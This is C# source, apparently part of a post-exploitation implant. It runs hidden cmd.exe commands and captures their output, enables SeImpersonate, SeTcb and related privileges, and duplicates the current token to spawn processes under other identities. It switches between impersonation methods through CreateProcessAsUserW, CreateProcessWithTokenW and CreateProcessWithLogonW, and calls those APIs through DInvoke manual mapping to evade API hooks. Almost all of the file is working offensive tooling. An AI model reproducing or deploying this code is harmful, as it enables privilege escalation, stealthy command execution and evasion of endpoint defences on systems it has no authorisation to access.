public static extern bool CreateProcessWithTokenW(
IntPtr hToken,
DInvoke.Win32.Kernel32.LogonFlags dwLogonFlags,
string lpApplicationName,
string lpCommandLine,
DInvoke.Win32.Kernel32.CreationFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
[In] ref DInvoke.Win32.WinNT.StartupInfo lpStartupInfo,
out DInvoke.Win32.Kernel32.ProcessInformation lpProcessInformation);
public static extern bool CreateProcessWithLogonW(
string userName,
string domain,
string password,
DInvoke.Win32.Kernel32.LogonFlags logonFlags,
string applicationName,
string commandLine,
DInvoke.Win32.Kernel32.CreationFlags creationFlags,
uint environment,
string currentDirectory,
ref DInvoke.Win32.WinNT.StartupInfo startupInfo,
out DInvoke.Win32.Kernel32.ProcessInformation processInformation);
public static extern bool CreateProcessAsUserW(
IntPtr hToken,
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
DInvoke.Win32.Kernel32.CreationFlags dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref DInvoke.Win32.WinNT.StartupInfo lpStartupInfo,
out DInvoke.Win32.Kernel32.ProcessInformation lpProcessInformation);
internal static void RunAs(string domain, string user, string password)
{
var startupInfo = new DInvoke.Win32.WinNT.StartupInfo();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
const DInvoke.Win32.Kernel32.LogonFlags logonFlags = new DInvoke.Win32.Kernel32.LogonFlags();
if (!CreateProcessWithLogonW(user, domain, password, logonFlags, null, @"c:\windows\system32\cmd.exe /Q /C hostname", 0, 0, null, ref startupInfo, out _))
{
return;
}
TokenManager._method = 3;
TokenManager._credentials[0] = user;
TokenManager._credentials[1] = domain;
TokenManager._credentials[2] = password;
}
/////////////////////////// Commands execution ///////////////////////////
public static string ExecuteCommand(string command, SysCallManager sysCall)
{
var output = "";
if (TokenManager._token == IntPtr.Zero && TokenManager._method == 0)
{
var process = new Process();
var startInfo = new ProcessStartInfo
{
WindowStyle = ProcessWindowStyle.Hidden,
FileName = @"C:\windows\system32\cmd.exe",
Arguments = "/C " + command,
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false
};
process.StartInfo = startInfo;
process.Start();
output = process.StandardOutput.ReadToEnd();
if (output == "")
{
output = string.Concat("ERR:", process.StandardError.ReadToEnd());
}
process.WaitForExit();
process.Close();
}
else
{
var outRead = IntPtr.Zero;
var outWrite = IntPtr.Zero;
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
var saAttr = new DInvoke.Win32.Kernel32.SecurityAttributes
{
nLength = Marshal.SizeOf(typeof(DInvoke.Win32.Kernel32.SecurityAttributes)),
bInheritHandle = true,
lpSecurityDescriptor = IntPtr.Zero
};
object[] createPipe = { outRead, outWrite, saAttr, 0 };
var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "CreatePipe",
typeof(DInvoke.Win32.DELEGATES.CreatePipe), createPipe);
outRead = (IntPtr)createPipe[0];
outWrite = (IntPtr)createPipe[1];
saAttr = (DInvoke.Win32.Kernel32.SecurityAttributes)createPipe[2];
var startupInfo = new DInvoke.Win32.WinNT.StartupInfo();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.hStdOutput = outWrite;
startupInfo.hStdError = outWrite;
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000101;
var l = new DInvoke.Win32.Kernel32.LogonFlags();
switch (TokenManager._method)
{
case 1:
CreateProcessAsUserW(TokenManager._token, null, @"c:\windows\system32\cmd.exe /Q /C" + @command, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _);
break;
case 2:
CreateProcessWithTokenW(TokenManager._token, l, null, @"c:\windows\system32\cmd.exe /Q /C" + @command, 0, IntPtr.Zero, null, ref startupInfo, out _);
break;
default:
CreateProcessWithLogonW(TokenManager._credentials[0], TokenManager._credentials[1], TokenManager._credentials[2], l, null, @"c:\windows\system32\cmd.exe /Q /C" + command, 0, 0, null, ref startupInfo, out _);
break;
}
var buf = new byte[100];
var dwRead = 0;
Thread.Sleep(500);
while (true)
{
var bSuccess = ReadFile(outRead, buf, 100, ref dwRead, IntPtr.Zero);
output = string.Concat(output, Encoding.Default.GetString(buf));
if (!bSuccess || dwRead < 100)
{
break;
}
}
CloseHandle(outRead);
CloseHandle(outWrite);
}
return(output);
}
public static void Start()
{
var sysCall = new SysCallManager();
try
{
var token = WindowsIdentity.GetCurrent().Token;
var newToken = IntPtr.Zero;
var privileges = new List <string>
{
"SeImpersonatePrivilege",
"SeTcbPrivilege",
"SeAssignPrimaryTokenPrivilege",
"SeIncreaseQuotaPrivilege"
};
var currentToken = IntPtr.Zero;
GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out currentToken,
sysCall);
EnablePrivileges(currentToken, privileges, sysCall);
CloseHandle(currentToken);
const DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS tokenAccess = DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenQuery | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAssignPrimary |
DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenDuplicate | DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustDefault |
DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustSessionId;
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\advapi32.dll");
object[] duplicateToken = { token, tokenAccess, IntPtr.Zero, DInvoke.Win32.WinNT._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, DInvoke.Win32.WinNT.TOKEN_TYPE.TokenPrimary, newToken };
bool status = (bool)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "DuplicateTokenEx",
typeof(DInvoke.Win32.DELEGATES.DuplicateTokenEx), duplicateToken);
if (!status)
{
return;
}
else
{
newToken = (IntPtr)duplicateToken[5];
}
var startupInfo = new DInvoke.Win32.WinNT.StartupInfo();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
const DInvoke.Win32.Kernel32.LogonFlags logonFlags = new DInvoke.Win32.Kernel32.LogonFlags();
if (CreateProcessAsUserW(newToken, null,
@"c:\windows\system32\cmd.exe /Q /C whoami && exit", IntPtr.Zero,
IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _))
{
TokenManager._token = newToken;
TokenManager._method = 1;
}
else
{
if (!CreateProcessWithTokenW(newToken, logonFlags, null,
@"c:\windows\system32\cmd.exe /Q /C whoami && exit", 0, IntPtr.Zero,
null, ref startupInfo, out _))
{
return;
}
TokenManager._token = newToken;
TokenManager._method = 2;
}
}
catch
{
}
}
public static void DetermineImpersonationMethod(IntPtr token, DInvoke.Win32.Kernel32.LogonFlags l, DInvoke.Win32.WinNT.StartupInfo startupInfo, out DInvoke.Win32.Kernel32.ProcessInformation processInfo)
{
if (CreateProcessAsUserW(token, null, @"c:\windows\system32\cmd.exe /Q /C hostname && exit", IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager._method = 1;
}
else
if (CreateProcessWithTokenW(token, l, null, @"c:\windows\system32\cmd.exe /Q /C hostname && exit", 0,
IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager._method = 2;
}
}
